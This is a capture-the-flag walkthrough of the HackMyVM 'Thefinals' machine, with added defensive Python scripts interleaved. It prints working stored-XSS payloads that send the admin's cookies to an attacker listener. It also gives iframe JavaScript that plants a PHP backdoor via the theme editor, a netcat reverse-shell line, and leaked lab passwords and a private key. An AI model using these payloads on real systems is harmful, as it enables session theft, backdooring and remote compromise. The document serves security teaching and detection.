HackMyVM-Thefinals-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.165 08:00:27:3a:16:eb PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:77:39 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.042 seconds (125.37 hosts/sec). 4 responded
export ip=192.168.60.165
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.165:22
Open 192.168.60.165:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 22:07 CST
Initiating ARP Ping Scan at 22:07
Scanning 192.168.60.165 [1 port]
Completed ARP Ping Scan at 22:07, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:07
Completed Parallel DNS resolution of 1 host. at 22:07, 0.17s elapsed
DNS resolution of 1 IPs took 0.17s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:07
Scanning 192.168.60.165 [2 ports]
Discovered open port 80/tcp on 192.168.60.165
Discovered open port 22/tcp on 192.168.60.165
Completed SYN Stealth Scan at 22:07, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.165
Host is up, received arp-response (0.00057s latency).
Scanned at 2025-04-29 22:07:44 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:3A:16:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

Directory Enumeration

```
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.165
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 15280]
/blog (Status: 301) [Size: 313] [--> http://192.168.60.165/blog/]
/images (Status: 301) [Size: 315] [--> http://192.168.60.165/images/]
/screenshots (Status: 301) [Size: 320] [--> http://192.168.60.165/screenshots/]
/css (Status: 301) [Size: 312] [--> http://192.168.60.165/css/]
/js (Status: 301) [Size: 311] [--> http://192.168.60.165/js/]
/fonts (Status: 301) [Size: 314] [--> http://192.168.60.165/fonts/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================
```

There is a /blog, built on the Typecho framework.

The homepage also reveals the domain THEFINALS.hmv.

Edit the hosts file to add the domain (note that `tee` without `-a` replaces the whole file; `tee -a` appends instead):

```
echo "$ip THEFINALS.hmv"|sudo tee /etc/hosts
[sudo] password for Pepster:
192.168.60.165 THEFINALS.hmv
```

Tried enumerating subdirectories of the domain; nothing turned up.

Stored XSS

Let's focus on the Typecho blog instead.

Service version detection shows the blog runs version 1.2.0.


Search online for known vulnerabilities in this version.

There happens to be an XSS vulnerability:

XSS vulnerability still present in v1.2.1-rc · Issue #1560 · Typecho/Typecho

Typecho <= 1.2.0 Comments URL with Stored-XSS Vulnerability - 1manityの秘密基地

Typecho<=1.2.0 stored XSS reproduction - SuperWinner - 博客园

The exploitation conditions are very simple: just put the following payload in the Website field of a comment.

```
http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#
```
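Why that payload works, and what a fix looks like, as an added example that is not part of the original write-up or of Typecho's code: the stored Website value is reflected inside an `href="..."` attribute, so a `"` closes the attribute and the rest of the string becomes new markup. The vulnerable renderer below is only a minimal model of that behaviour (it is not Typecho's template); the hardened version, `sanitize_url` and `flag_suspicious_urls` are my own names, and `flag_suspicious_urls` is the triage step you would run over the url column of `typecho_comments` after the fact.

```python
import html
import re
from urllib.parse import urlsplit

# Payload from the write-up above, as it would be stored in the comment's "Website" field.
PAYLOAD = 'http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#'
ALLOWED_SCHEMES = {"http", "https"}


def render_author_link_vulnerable(url, name):
    """Minimal model of the bug: the stored URL lands inside href without attribute escaping."""
    return '<a href="' + url + '">' + html.escape(name) + '</a>'


def sanitize_url(url):
    """Hypothetical hardening: parse first, allow only absolute http(s) URLs, then escape for attribute context."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return html.escape(url, quote=True)


def render_author_link_hardened(url, name):
    """Same output shape as the vulnerable renderer, but the link is dropped when the URL is unsafe."""
    safe = sanitize_url(url)
    if safe is None:
        return html.escape(name)
    return '<a href="' + safe + '">' + html.escape(name) + '</a>'


def count_script_tags(markup):
    """Count real <script> openings in rendered markup; escaped ones (&lt;script) do not count."""
    return len(re.findall(r"<script\b", markup, flags=re.I))


def flag_suspicious_urls(stored_urls):
    """Triage helper for values already in the database: anything able to break out of an
    href attribute, or not plain http(s), is flagged for review."""
    flagged = []
    for url in stored_urls:
        if re.search(r'["<>]', url) or urlsplit(url.strip()).scheme.lower() not in ALLOWED_SCHEMES:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    print("vulnerable:", render_author_link_vulnerable(PAYLOAD, "aaa"))
    print("hardened:  ", render_author_link_hardened(PAYLOAD, "aaa"))
    print("flagged:   ", flag_suspicious_urls([PAYLOAD, "https://example.com/", "javascript:alert(1)"]))
```

Escaping alone is not enough for an `href`: a `javascript:` URL needs no quote to run, which is why the scheme allowlist comes before the escaping step.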


Moreover, the very first post states that the administrator checks regularly, so we can guess the target runs a scheduled task that views the comments on posts.


We can try to hijack the administrator's cookie.

Use the following payload:

```
http://xxx.xxx.com/"></a><script>document.location='http://192.168.60.100:8000/abc?c='+document.cookie</script><a/href="#
```

Listen on a port:
```
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.1 - - [29/Apr/2025 22:41:27] code 404, message File not found
192.168.60.1 - - [29/Apr/2025 22:41:27] "GET /xss.php?c=7d07d00c3730d08dbac222ccaf73fd49__typecho_remember_author=aaa;%207d07d00c3730d08dbac222ccaf73fd49__typecho_remember_mail=aaa%40aaa.com;%207d07d00c3730d08dbac222ccaf73fd49__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.60.100%3A8000%2Fxss.php%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23 HTTP/1.1" 404 -
192.168.60.165 - - [29/Apr/2025 22:42:02] code 404, message File not found
192.168.60.165 - - [29/Apr/2025 22:42:02] "GET /xss.php?c=7d07d00c3730d08dbac222ccaf73fd49__typecho_uid=1;%207d07d00c3730d08dbac222ccaf73fd49__typecho_authCode=%24T%24STEAJUfF0b618b5d188a8110f0e5dbe8a293e91bb;%20PHPSESSID=63171510946a3cb316930bd5b0f8bd0b HTTP/1.1" 404 -
```
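The two request lines above are what a cookie-theft callback looks like from the receiving end, and the same pattern is what a defender would hunt for in web-proxy or egress logs. As an added example (not part of the original write-up), the script below parses those exact lines, URL-decodes the query string, splits it the way a `Cookie` header is split, and reports only the hits that carry a session cookie (`PHPSESSID`, Typecho's `__typecho_uid` / `__typecho_authCode`), so the attacker's own "remember me" test request from 192.168.60.1 is not reported. `SAMPLE_LOG` is copied from the output above; `find_cookie_exfil` and `cookie_names_in_query` are my names.

```python
import re
from urllib.parse import unquote

# Copied from the python3 -m http.server output above; the "code 404" lines are
# kept to show that non-request lines are skipped.
SAMPLE_LOG = """\
192.168.60.1 - - [29/Apr/2025 22:41:27] code 404, message File not found
192.168.60.1 - - [29/Apr/2025 22:41:27] "GET /xss.php?c=7d07d00c3730d08dbac222ccaf73fd49__typecho_remember_author=aaa;%207d07d00c3730d08dbac222ccaf73fd49__typecho_remember_mail=aaa%40aaa.com;%207d07d00c3730d08dbac222ccaf73fd49__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.60.100%3A8000%2Fxss.php%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23 HTTP/1.1" 404 -
192.168.60.165 - - [29/Apr/2025 22:42:02] code 404, message File not found
192.168.60.165 - - [29/Apr/2025 22:42:02] "GET /xss.php?c=7d07d00c3730d08dbac222ccaf73fd49__typecho_uid=1;%207d07d00c3730d08dbac222ccaf73fd49__typecho_authCode=%24T%24STEAJUfF0b618b5d188a8110f0e5dbe8a293e91bb;%20PHPSESSID=63171510946a3cb316930bd5b0f8bd0b HTTP/1.1" 404 -
"""

# http.server request line: client, timestamp, "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)
# Cookies whose leakage means a live session was stolen, not just a "remember me" preference.
SENSITIVE = {"PHPSESSID", "__typecho_uid", "__typecho_authCode"}
# Typecho prefixes its cookie names with a 32-hex-char site hash; strip it so names compare cleanly.
PREFIX_RE = re.compile(r"^[0-9a-f]{32}(?=__)")


def cookie_names_in_query(query):
    """Return the cookie names found in any query parameter whose value looks like a Cookie header."""
    names = []
    for pair in query.split("&"):
        _key, _sep, raw = pair.partition("=")
        value = unquote(raw)                      # "%3B%20" -> "; ", "%24" -> "$", ...
        for item in value.split(";"):
            name, sep, _value = item.strip().partition("=")
            if sep and name:
                names.append(PREFIX_RE.sub("", name))
    return names


def find_cookie_exfil(log_text):
    """Scan http.server-style log lines and report requests carrying a session cookie in the query."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _q, query = m.group("target").partition("?")
        leaked = [n for n in cookie_names_in_query(query) if n in SENSITIVE]
        if leaked:
            findings.append({"client": m.group("client"), "time": m.group("ts"),
                             "path": path, "cookies": leaked})
    return findings


if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} -> {hit['path']} leaked {', '.join(hit['cookies'])}")
```

The second request is the one that matters: it comes from the target itself (the admin bot) and carries `PHPSESSID` and the Typecho auth cookie. Marking those cookies `HttpOnly` would have kept `document.cookie` from reading them in the first place, which is why the flag is worth checking in any application that renders user-supplied content.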

After obtaining the administrator's cookie, try forging it to access the admin page.

After refreshing, it still does not work.

The XSS is stored, so I can no longer visit the post; as soon as I do, it redirects to my HTTP server.

Either reinstall the target, or capture the comment-submission request and edit it there.

Use a JS script instead, and reference it from the page:

```
http://xxx.xxx.com/"></a><script/src=http://192.168.60.100:8000/cookie.js></script><a/href="#
```

At the same time, write a cookie.js file locally:

```
❯ echo 'x=new XMLHttpRequest;x.open("GET","http://192.168.60.100:8000?cookie="+btoa(document.cookie));x.send();' > cookie.js
```

This captures the cookie just the same.

Of course, the XSS can also be used to hijack the administrator's own actions while they view the comments.

Load the theme editor page in an iframe, tamper with the file contents through DOM manipulation, and insert a PHP backdoor into 404.php:

```javascript
// Insert a hidden iframe at the end of the page
function insertIframe() {
    const currentPath = window.location.pathname;
    const isCommentPage = currentPath.includes("manage-comments.php");

    // Build the iframe src dynamically
    let targetSrc;
    if (isCommentPage) {
        targetSrc = currentPath.replace(
            'manage-comments.php',
            'theme-editor.php?theme=default&file=404.php' // fixed &amp; -> &
        );
    } else {
        targetSrc = '/admin/theme-editor.php?theme=default&file=404.php';
    }

    // Template string for readability
    const iframeHTML = `
        <iframe
            id="theme_id"
            src="${targetSrc}"
            width="0%"
            height="0%"
            onload="writeShell()"
        ></iframe>
    `;

    // Append to the bottom of the page
    document.body.innerHTML += iframeHTML;
}

// Guard against running twice
let isSaved = false;

// Inject PHP into the editor inside the iframe and trigger save
function writeShell() {
    if (isSaved) return;

    const iframeWindow = document.getElementById('theme_id').contentWindow;
    const editorContent = iframeWindow.document.getElementById('content');
    const saveButton = iframeWindow.document.getElementsByTagName('button')[1];

    // Prepend the PHP code to the editor contents
    editorContent.value = '<?php phpinfo(); ?>\n' + editorContent.value;

    // Simulate a click on the save button
    saveButton.click();
    isSaved = true;
}

// Entry point
insertIframe();
```

We can change the webshell content to `<?php exec("nc 192.168.60.100 4444 -e /bin/ash");?>\n`

because the target has no bash, only ash.

After waiting for the administrator to visit the modified page,

try accessing:

http://thefinals.hmv/blog/usr/themes/default/404.php
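What the defender sees after this step is a theme file that changed without a deployment. As an added example (not part of the original write-up, and not a Typecho feature), the script below does the two checks an incident responder would run against a theme directory: compare every `.php` file against a known-good hash manifest, and grep the current contents for command-execution functions that a template has no reason to call. The directory tree and the tamper step are constructed inline so it runs offline; the injected line is the one used in the write-up above. Function names (`baseline`, `scan_theme`, `build_demo_theme`, `simulate_tamper`) are mine.

```python
import hashlib
import pathlib
import re
import tempfile

# Calls a theme template has no business making; "exec(" is the one used in the write-up.
SUSPICIOUS = re.compile(r"\b(exec|system|passthru|shell_exec|popen|proc_open|eval|assert)\s*\(", re.I)

# The line the write-up injects through the theme editor (used here only to build the demo).
BACKDOOR_LINE = '<?php exec("nc 192.168.60.100 4444 -e /bin/ash");?>\n'


def sha256_file(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def baseline(root):
    """Hash every .php file below root. Store this manifest when the theme is known-good."""
    root = pathlib.Path(root)
    return {str(p.relative_to(root)): sha256_file(p) for p in sorted(root.rglob("*.php"))}


def scan_theme(root, known_good):
    """Report files that were added, modified or deleted relative to the manifest,
    plus any file (changed or not) that now contains a suspicious call."""
    root = pathlib.Path(root)
    findings = []
    current = baseline(root)
    for rel, digest in current.items():
        if rel not in known_good:
            status = "added"
        elif known_good[rel] != digest:
            status = "modified"
        else:
            status = None
        text = (root / rel).read_text(errors="replace")
        calls = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(text)})
        if status or calls:
            findings.append({"file": rel, "status": status or "unchanged", "suspicious": calls})
    for rel in known_good:
        if rel not in current:
            findings.append({"file": rel, "status": "deleted", "suspicious": []})
    return findings


def build_demo_theme():
    """Constructed sample: a throwaway theme directory with two clean templates."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="theme-demo-"))
    (root / "index.php").write_text("<?php $this->need('header.php'); ?>\n<h1>Blog</h1>\n")
    (root / "404.php").write_text("<?php $this->need('header.php'); ?>\n<h2>Page not found</h2>\n")
    return root


def simulate_tamper(root):
    """Prepend the backdoor line to 404.php, mirroring what the injected JS does in the editor."""
    target = pathlib.Path(root) / "404.php"
    target.write_text(BACKDOOR_LINE + target.read_text())


if __name__ == "__main__":
    demo = build_demo_theme()
    manifest = baseline(demo)
    print("clean scan:", scan_theme(demo, manifest))
    simulate_tamper(demo)
    print("after tamper:", scan_theme(demo, manifest))
```

The hash comparison catches any edit, the signature pass catches a fresh file that was never in the manifest. Neither would be needed if the theme directory were not writable by the web server user in the first place, which is the underlying fix: the editor could only write `404.php` because the PHP process owns it.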

User Privilege Escalation

Listen on a port:

```
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from thefinals.hmv-192.168.60.166-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/thefinals.hmv~192.168.60.166_Linux_x86_64/2025_05_02-17_12_57-296.log 📜
────────────────────────────────────────────────────────────────────
/var/www/html/blog/usr/themes/default $
```

Three users exist: june, scotty and staff.

```
/var/www/html/blog/usr/themes/default $ cat /etc/passwd |grep ash
june:x:1001:100::/home/june:/bin/ash
scotty:x:1002:100::/home/scotty:/bin/ash
staff:x:1000:100::/home/staff:/bin/ash
```

We can enter june's home directory and get the user flag,

and there is also a hint:

```
/home/june $ cat user.flag
……………………

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}

/home/june $ ls -la
total 16
drwxr-sr-x 2 june users 4096 Apr 3 17:00 .
drwxr-xr-x 5 root root 4096 Apr 3 13:21 ..
lrwxrwxrwx 1 root users 9 Apr 3 12:24 .ash_history -> /dev/null
-rw-r--r-- 1 june users 183 Apr 15 08:28 message.txt
-rw-r--r-- 1 june users 3421 Apr 3 12:29 user.flag
/home/june $ cat message.txt
Contestants, gear up and get ready! Who's got the KEY? Who's got the the guts?
--- This BROADCAST has been hacked by CNS
```

In the filesystem root, /opt is not readable for us; only the staff group can read it.

```
/ $ ls -al
total 80
…………………………
drwxrwx--- 3 root staff 4096 Apr 3 13:29 opt
…………………………
```

I tried searching for other information and obtained the staff user's hash,

but it could not be cracked, so I gave up.

```
/var/www/html/blog $ cat config.inc.php
<?php
// site root path
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));

// plugin directory (relative path)
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');

// theme directory (relative path)
define('__TYPECHO_THEME_DIR__', '/usr/themes');

// admin directory (relative path)
define('__TYPECHO_ADMIN_DIR__', '/admin/');

// register autoload
require_once __TYPECHO_ROOT_DIR__ . '/var/Typecho/Common.php';

// init
\Typecho\Common::init();

// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
  'host' => 'localhost',
  'port' => 3306,
  'user' => 'typecho_u',
  'password' => 'QLTkbviW71CSRZtGWIQdB6s',
  'charset' => 'utf8mb4',
  'database' => 'typecho_db',
  'engine' => 'InnoDB',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);
/var/www/html/blog $ mysql -utypecho_u -pQLTkbviW71CSRZtGWIQdB6s
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 57
Server version: 11.4.5-MariaDB Alpine Linux

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| test               |
| typecho_db         |
+--------------------+
3 rows in set (0.004 sec)

MariaDB [(none)]> use typecho_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [typecho_db]> show tables;
+-----------------------+
| Tables_in_typecho_db  |
+-----------------------+
| typecho_comments      |
| typecho_contents      |
| typecho_fields        |
| typecho_metas         |
| typecho_options       |
| typecho_relationships |
| typecho_users         |
+-----------------------+
7 rows in set (0.001 sec)

MariaDB [typecho_db]> select * from typecho_users;
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| uid | name  | password                           | mail                | url                       | screenName | created    | activated  | logged     | group         | authCode                         |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
|   1 | staff | $P$B/qMMS9FETOrEZ38X0YDY5gKJOyiwQ1 | [email protected]     | http://thefinals.hmv/blog | staff      | 1743647281 | 1746628622 | 1746628562 | administrator | 90814ec07c16a76283201f52dbc740b0 |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
1 row in set (0.002 sec)

MariaDB [typecho_db]> exit
Bye
```

Of the three users, june's home is readable and staff led nowhere, so the remaining lead is scotty.

Private Key Broadcast

Look for files related to the scotty user.

There is a log file whose contents look like packets being sent continuously to port 1337 of some IP:

```
/home $ find / -user scotty -type f 2>/dev/null |grep -Ev "proc"
/var/log/scotty-main.err
/var/log/scotty-main.log
/home $ cat /var/log/scotty-main.err
/home $ head /var/log/scotty-main.log
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
```

Try listening on port 1337.

Plain TCP gets nothing; in UDP mode,

we receive a block of encoded text:

```
/home $ nc -lvp 1337
listening on [::]:1337 ...

/home $ nc -u -lp 1337
```

Decoding it gives the content of a private key.
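A key being sprayed over the LAN broadcast address is exactly the kind of thing a network monitor should classify on sight, without ever using the key. As an added example (not part of the original write-up), the script below takes a UDP payload, tries it raw and base64-unwrapped, and if it finds an `openssh-key-v1` envelope parses only the header: cipher and KDF (so whether the key is passphrase-protected), key type, and the comment field, which identifies whose key leaked. The sample key is constructed inline with counter bytes in place of real key material, so it is syntactically valid but cryptographically meaningless; `describe_openssh_key`, `inspect_datagram` and `build_constructed_key` are my names. Run against the key shown later in this write-up, it reports type `ssh-ed25519`, cipher `none` (unencrypted) and the comment `root@thefinals.hmv`.

```python
import base64
import binascii
import struct

PEM_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_FOOTER = b"-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 big-endian length, then bytes)."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def _string(data):
    return struct.pack(">I", len(data)) + data


def describe_openssh_key(pem):
    """Return metadata (never key material) for an openssh-key-v1 envelope, or None if it is not one."""
    body = pem.strip()
    if not (body.startswith(PEM_HEADER) and body.endswith(PEM_FOOTER)):
        return None
    blob = base64.b64decode(b"".join(body.splitlines()[1:-1]))
    if not blob.startswith(MAGIC):
        return None
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdf_options, off = _read_string(blob, off)
    (nkeys,) = struct.unpack_from(">I", blob, off)
    off += 4
    pub_blob, off = _read_string(blob, off)
    key_type, _ = _read_string(pub_blob, 0)        # public part starts with the type name
    info = {"type": key_type.decode(), "cipher": cipher.decode(), "kdf": kdf.decode(),
            "keys": nkeys, "encrypted": cipher != b"none", "comment": None}
    if cipher == b"none":
        # Unencrypted private section: checkint, checkint, type, pubkey, privkey, comment, padding.
        priv, _ = _read_string(blob, off)
        p = 8
        _type, p = _read_string(priv, p)
        _pub, p = _read_string(priv, p)
        _secret, p = _read_string(priv, p)       # skipped, never returned
        comment, _ = _read_string(priv, p)
        info["comment"] = comment.decode(errors="replace")
    return info


def _maybe_base64(data):
    try:
        return base64.b64decode(b"".join(data.split()), validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_datagram(payload):
    """Check a UDP payload, raw or base64-wrapped, for a leaked OpenSSH private key."""
    for candidate in (payload, _maybe_base64(payload)):
        if candidate and PEM_HEADER in candidate:
            return describe_openssh_key(candidate)
    return None


def build_constructed_key(comment=b"constructed@example.test"):
    """Constructed sample: a well-formed ed25519 envelope whose key bytes are just counters."""
    pk, sk = bytes(range(32)), bytes(range(64))
    priv = (struct.pack(">II", 0x01020304, 0x01020304) + _string(b"ssh-ed25519")
            + _string(pk) + _string(sk) + _string(comment))
    if len(priv) % 8:
        priv += bytes(range(1, 8 - len(priv) % 8 + 1))   # OpenSSH pads with 1, 2, 3, ...
    blob = (MAGIC + _string(b"none") + _string(b"none") + _string(b"") + struct.pack(">I", 1)
            + _string(_string(b"ssh-ed25519") + _string(pk)) + _string(priv))
    b64 = base64.b64encode(blob)
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return b"\n".join([PEM_HEADER, *lines, PEM_FOOTER]) + b"\n"


if __name__ == "__main__":
    import socket
    import sys
    print(describe_openssh_key(build_constructed_key()))
    if "--listen" in sys.argv:
        # Monitor side of the broadcast seen in the write-up: bind UDP 1337 and classify each datagram.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind(("0.0.0.0", 1337))
        while True:
            data, peer = sock.recvfrom(65535)
            print(peer, inspect_datagram(data))
```

The `encrypted` field is the one that decides severity: an envelope with cipher `none` is usable by anyone who captures it, while a passphrase-protected one still needs the passphrase. Either way the response is the same, revoke the key from every `authorized_keys` that lists it.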


Root Privilege Escalation

Connect over SSH with the key; the user has sudo rights to run /sbin/secret.

```
/home $ cd /tmp/
/tmp $ vi id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEwAAAJgDc/YUA3P2
FAAAAAtzc2gtZWQyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEw
AAAECv7kfeoXOQCi5CRIWdHiDT5upKyY3vQxAlKmxEQzRZLDXCfT3imE6qx9uj6jcIFiI3
fEDXrKYpJtfZRjfbH8ATAAAAEnJvb3RAdGhlZmluYWxzLmhtdgECAw==
-----END OPENSSH PRIVATE KEY-----
/tmp $ chmod 600 id_rsa
/tmp $ ssh scotty@127.0.0.1 -i id_rsa
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:EzmhY2U9+FvurEu825jyirPaiFVcHNA2joTW03K3glk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).

thefinals:~/cns_boardcast$ sudo -l
Matching Defaults entries for scotty on thefinals:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for scotty:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret
thefinals:~/cns_boardcast$ sudo /sbin/secret -h
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
thefinals:~/cns_boardcast$ sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
```

It errors out, saying we have no permission to operate on that terminal.

It turns out the terminal /dev/pts/99 does not exist:

```
thefinals:~/cns_boardcast$ ls -al /dev/pts/99
ls: /dev/pts/99: No such file or directory
```

So we can use python to keep spawning new pseudo-terminals, raising the tty count until /dev/pts/99 exists:

```
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
………………………………*99
```

Then run the secret program again,

and the credentials arrive in the other tty:

```
thefinals:~$ sudo  /sbin/secret
------------------------
/tmp $ root:p8RuoQGTtlKLAjuF1Tpy5wX
```

Try logging in with it; it does not work:

```
thefinals:~$ su root
Password:
su: incorrect password
```

Try the credentials against MySQL instead.

This yields the final root credentials root:BvIpFDyB4kNbkyqJGwMzLcK:

```
thefinals:~$ mysql -uroot -pp8RuoQGTtlKLAjuF1Tpy5wX
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 268
Server version: 11.4.5-MariaDB Alpine Linux

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| secret             |
| sys                |
| test               |
| typecho_db         |
+--------------------+
7 rows in set (0.007 sec)

MariaDB [(none)]> use secret
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [secret]> show tables;
+------------------+
| Tables_in_secret |
+------------------+
| user             |
+------------------+
1 row in set (0.001 sec)

MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password                |
+----+----------+-------------------------+
|  1 | root     | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.002 sec)
```

Log in and we are done. The author also compiled the credentials of every user and the related flags; very thorough 🫡

```
thefinals:~$ su
Password:
/home/scotty # id
